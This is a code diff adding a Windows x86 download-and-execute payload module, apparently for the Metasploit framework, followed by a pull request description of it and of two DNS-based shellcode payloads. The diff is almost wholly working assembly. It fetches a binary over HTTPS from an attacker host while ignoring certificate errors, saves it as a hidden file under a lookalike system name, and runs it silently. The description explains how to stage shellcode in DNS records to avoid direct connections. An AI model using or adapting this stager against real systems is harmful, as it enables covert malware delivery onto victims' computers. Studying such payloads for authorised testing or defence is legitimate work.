+			'Version'       => "$Revision$",
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86
+		))
+
+		# EXITFUNC is not supported 
+		deregister_options('EXITFUNC')
+
+		# Register command execution options
+		register_options(
+			[
+				OptString.new('RHOST', [ true, "The webserver hosting the executable to download" ]),
+				OptString.new('URI', [true, "The full URI to the binary" ,"/"]),
+				OptInt.new('PORT', [ true, "The HTTPS port to connect to", 443]),
+				OptString.new('EXE', [ true, "Filename to save & run executable on target system", "rund11.exe" ])
+			], self.class)
+	end
+
+	#
+	# Construct the payload
+	#
+	def generate
+
+		port_nr		= datastore['PORT'] || 443	
+		server_host	= datastore['RHOST']
+		server_uri	= datastore['URI'] 
+		filename	= datastore['EXE']
+
+		#create actual payload
+		payload_data = <<EOS
+	cld
+	call start
+; Stephen Fewer's block_api
+; block_api code (Stephen Fewer)
+api_call:
+	pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.
+	mov ebp, esp           ; Create a new stack frame
+	xor edx, edx           ; Zero EDX
+	mov edx, fs:[edx+48]   ; Get a pointer to the PEB
+	mov edx, [edx+12]      ; Get PEB->Ldr
+	mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
+next_mod:
+	mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
+	movzx ecx, word [edx+38] ; Set ECX to the length we want to check 
+	xor edi, edi           ; Clear EDI which will store the hash of the module name
+loop_modname:            ;
+	xor eax, eax           ; Clear EAX
+	lodsb                  ; Read in the next byte of the name
+	cmp al, 'a'            ; Some versions of Windows use lower case module names
+	jl not_lowercase       ;
+	sub al, 0x20           ; If so normalise to uppercase
+not_lowercase:           ;
+	ror edi, 13            ; Rotate right our hash value
+	add edi, eax           ; Add the next byte of the name
+	loop loop_modname      ; Loop untill we have read enough
+	; We now have the module hash computed
+	push edx               ; Save the current position in the module list for later
+	push edi               ; Save the current module hash for later
+	; Proceed to iterate the export address table, 
+	mov edx, [edx+16]      ; Get this modules base address
+	mov eax, [edx+60]      ; Get PE header
+	add eax, edx           ; Add the modules base address
+	mov eax, [eax+120]     ; Get export tables RVA
+	test eax, eax          ; Test if no export address table is present
+	jz get_next_mod1       ; If no EAT present, process the next module
+	add eax, edx           ; Add the modules base address
+	push eax               ; Save the current modules EAT
+	mov ecx, [eax+24]      ; Get the number of function names  
+	mov ebx, [eax+32]      ; Get the rva of the function names
+	add ebx, edx           ; Add the modules base address
+	; Computing the module hash + function hash
+get_next_func:           ;
+	jecxz get_next_mod     ; When we reach the start of the EAT (we search backwards), process the next module
+	dec ecx                ; Decrement the function name counter
+	mov esi, [ebx+ecx*4]   ; Get rva of next module name
+	add esi, edx           ; Add the modules base address
+	xor edi, edi           ; Clear EDI which will store the hash of the function name
+	; And compare it to the one we want
+loop_funcname:           ;
+	xor eax, eax           ; Clear EAX
+	lodsb                  ; Read in the next byte of the ASCII function name
+	ror edi, 13            ; Rotate right our hash value
+	add edi, eax           ; Add the next byte of the name
+	cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)
+	jne loop_funcname      ; If we have not reached the null terminator, continue
+	add edi, [ebp-8]       ; Add the current module hash to the function hash
+	cmp edi, [ebp+36]      ; Compare the hash to the one we are searchnig for 
+	jnz get_next_func      ; Go compute the next function hash if we have not found it
+	; If found, fix up stack, call the function and then value else compute the next one...
+	pop eax                ; Restore the current modules EAT
+	mov ebx, [eax+36]      ; Get the ordinal table rva      
+	add ebx, edx           ; Add the modules base address
+	mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal
+	mov ebx, [eax+28]      ; Get the function addresses table rva  
+	add ebx, edx           ; Add the modules base address
+	mov eax, [ebx+4*ecx]   ; Get the desired functions RVA
+	add eax, edx           ; Add the modules base address to get the functions actual VA
+	; We now fix up the stack and perform the call to the desired function...
+finish:
+	mov [esp+36], eax      ; Overwrite the old EAX value with the desired api address for the upcoming popad
+	pop ebx                ; Clear off the current modules hash
+	pop ebx                ; Clear off the current position in the module list
+	popad                  ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
+	pop ecx                ; Pop off the origional return address our caller will have pushed
+	pop edx                ; Pop off the hash value our caller will have pushed
+	push ecx               ; Push back the correct return value
+	jmp eax                ; Jump into the required function
+	; We now automagically return to the correct caller...
+get_next_mod:            ;
+	pop eax                ; Pop off the current (now the previous) modules EAT
+get_next_mod1:           ;
+	pop edi                ; Pop off the current (now the previous) modules hash
+	pop edx                ; Restore our position in the module list
+	mov edx, [edx]         ; Get the next module
+	jmp next_mod     	; Process this module
+
+; actual routine
+start:
+	pop ebp			; get ptr to block_api routine
+; based on HDM's block_reverse_https.asm
+load_wininet:
+	push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
+	push 0x696e6977        ; ...
+	mov esi, esp           ; Save a pointer to wininet
+	push esp               ; Push a pointer to the "wininet" string on the stack.
+	push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+	call ebp               ; LoadLibraryA( "wininet" )
+
+internetopen:
+	xor edi,edi
+	push edi               ; DWORD dwFlags
+	push edi               ; LPCTSTR lpszProxyBypass
+	push edi               ; LPCTSTR lpszProxyName
+	push edi               ; DWORD dwAccessType (PRECONFIG = 0)
+	push esi               ; LPCTSTR lpszAgent ("wininet\x00")
+	push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
+	call ebp
+
+	jmp dbl_get_server_host
+
+internetconnect:
+	pop ebx                ; Save the hostname pointer
+	xor ecx, ecx
+	push ecx               ; DWORD_PTR dwContext (NULL)
+	push ecx               ; dwFlags
+	push 3                 ; DWORD dwService (INTERNET_SERVICE_HTTP)
+	push ecx               ; password
+	push ecx               ; username
+	push #{port_nr}        ; PORT
+	push ebx               ; HOSTNAME
+	push eax               ; HINTERNET hInternet
+	push 0xC69F8957        ; hash( "wininet.dll", "InternetConnectA" )
+	call ebp
+
+	jmp get_server_uri
+
+httpopenrequest:
+	pop ecx
+	xor edx, edx           ; NULL
+	push edx               ; dwContext (NULL)
+	push (0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
+	;0x80000000 |        ; INTERNET_FLAG_RELOAD
+	;0x04000000 |        ; INTERNET_NO_CACHE_WRITE
+	;0x00800000 |        ; INTERNET_FLAG_SECURE
+	;0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
+	;0x00001000 |        ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
+	;0x00002000 |        ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
+	;0x00000200          ; INTERNET_FLAG_NO_UI
+	push edx               ; accept types
+	push edx               ; referrer
+	push edx               ; version
+	push ecx               ; url
+	push edx               ; method
+	push eax               ; hConnection
+	push 0x3B2E55EB        ; hash( "wininet.dll", "HttpOpenRequestA" )
+	call ebp
+	mov esi, eax           ; hHttpRequest
+
+set_retry:
+	push 0x10
+	pop ebx
+
+; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
+set_security_options:
+	push 0x00003380
+	mov eax, esp
+	push 4                 ; sizeof(dwFlags)
+	push eax               ; &dwFlags
+	push 31                ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
+	push esi               ; hRequest
+	push 0x869E4675        ; hash( "wininet.dll", "InternetSetOptionA" )
+	call ebp
+
+httpsendrequest:
+	xor edi, edi
+	push edi               ; optional length
+	push edi               ; optional
+	push edi               ; dwHeadersLength
+	push edi               ; headers
+	push esi               ; hHttpRequest
+	push 0x7B18062D        ; hash( "wininet.dll", "HttpSendRequestA" )
+	call ebp
+	test eax,eax
+	jnz allocate_memory
+
+try_it_again:
+	dec ebx
+	jz failure
+	jmp set_security_options
+
+dbl_get_server_host:
+	 jmp get_server_host
+
+get_server_uri:
+	call httpopenrequest
+
+server_uri:
+	db "/#{server_uri}", 0x00
+
+failure:
+	push 0x56A2B5F0        ; hardcoded to exitprocess for size
+	call ebp
+
+allocate_memory:
+	push 0x04              ; PAGE_READWRITE, doesn't need to be executable, less suspicious perhaps ?
+	push 0x1000            ; MEM_COMMIT
+	push 0x00400000        ; Stage allocation (8Mb ought to do us)
+	push edi               ; NULL as we dont care where the allocation is (zero'd from the prev function)
+	push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+	call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+download_prep:
+	xchg eax, ebx          ; place the allocated base address in ebx
+	push ebx               ; store a copy of the stage base address on the stack
+	push ebx               ; temporary storage for bytes read count
+	mov edi, esp           ; &bytesRead
+
+download_more:
+	push edi               ; &bytesRead
+	push 8192              ; read length
+	push ebx               ; buffer
+	push esi               ; hRequest
+	push 0xE2899612        ; hash( "wininet.dll", "InternetReadFile" )
+	call ebp
+
+	test eax,eax           ; download failed? (optional?)
+	jz failure
+
+	mov eax, [edi]
+	add ebx, eax           ; buffer += bytes_received
+
+	test eax,eax           ; optional?
+	jnz download_more      ; continue until it returns 0
+	pop eax                ; clear the temporary storage
+	; eax = 0
+
+; routine to save to file & execute
+save_as_target_file:
+	pop esi			; get start of buffer
+	sub ebx,esi		; nr of bytes
+	jmp get_filename
+get_filename_return:
+	pop edi			; ptr to filename
+	push eax		; hTemplateFile
+	push 2			; dwFlagsAndAttributes (Hidden)
+	push 2			; dwCreationDisposition (CREATE_ALWAYS)
+	push eax		; lpSecurityAttributes
+	push 2			; dwShareMode
+	push 2			; dwDesiredAccess
+	push edi		; lpFileName
+	push 0x4FDAF6DA		; kernel32.dll!CreateFileA
+	call ebp
+;write to the handle
+	push 0			; lpOverLapped
+	push esp		; lpNumberOfBytesWritten
+	push ebx		; nNumberOfBytesToWrite
+	push esi		; lpBuffer
+	push eax		; hFile
+	mov esi,eax		; save handle
+	push 0x5BAE572D		; kernel32.dll!WriteFile
+	call ebp
+
+;close the handle
+	push esi
+	push 0x528796C6		; kernel32.dll!CloseHandle
+	call ebp
+
+execute_file:
+	push 0			; don't show
+	push edi		; lpCmdLine
+	push 0x876F8B31		; kernel32.dll!WinExec
+	call ebp
+
+thats_all_folks:
+	push 0
+	push 0x56A2B5F0		;kernel32.dll!ExitProcess
+	call ebp
+
+get_filename:
+	call get_filename_return
+	db "#{filename}",0x00
+
+get_server_host:
+	call internetconnect
+
+server_host:
+	db "#{server_host}", 0x00
+
+
+
+EOS
+		the_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string
+	end
+
+
+end


### PR DESCRIPTION
Payload 1 : download_exec_https.rb
This payload allows you to download a binary (don't think it needs to have .exe extension) from a webserver.  (You need to host the binary and the webserver yourself).
The payload will download the file over HTTPS, using the IE proxy settings, drops the file on the target system (you can choose the filename) and runs it.

Payload 2 : dns_query_exec.rb
This payload allows you to read & execute shellcode from the reply for a KEY DNS record.
In order to make this work, you need the following things
1. Register a public DNS zone & make sure you can create KEY (not DNSSEC) records.  Alternatively, register a DNS zone, make the NS record point to your public IP & host your own DNS server
2. Create the shellcode you want to execute.  Write the shellcode to a file and base64 encode it.
3. Create a KEY DNS record and paste in the base64 encoded shellcode as key
4. Generate the dns_query_exec payload, using the FQDN of the newly created KEY record and use that in your exploit

Upon execution of the dns_query_exec payload, a DNS query will be performed.  The corporate DNS server, or online DNS servers should be more than happy to get the KEY for you so you can read it & execute it.
Or, in other words, this allows you to retrieve bigger payload from a remote system without connecting to it :)

Payload 3 : dns_txt_query_exec.rb

This one will retrieve all TXT records for a given domain, retrieve individual shellcode parts (based on tags that contain a sequence) from the TXT records, put them in the correct order, and execute them.

If you want to test, I have set up domain corelan.eu with payload (simple messagebox).(3 TXT records)
Usage instructions are inside the payload module
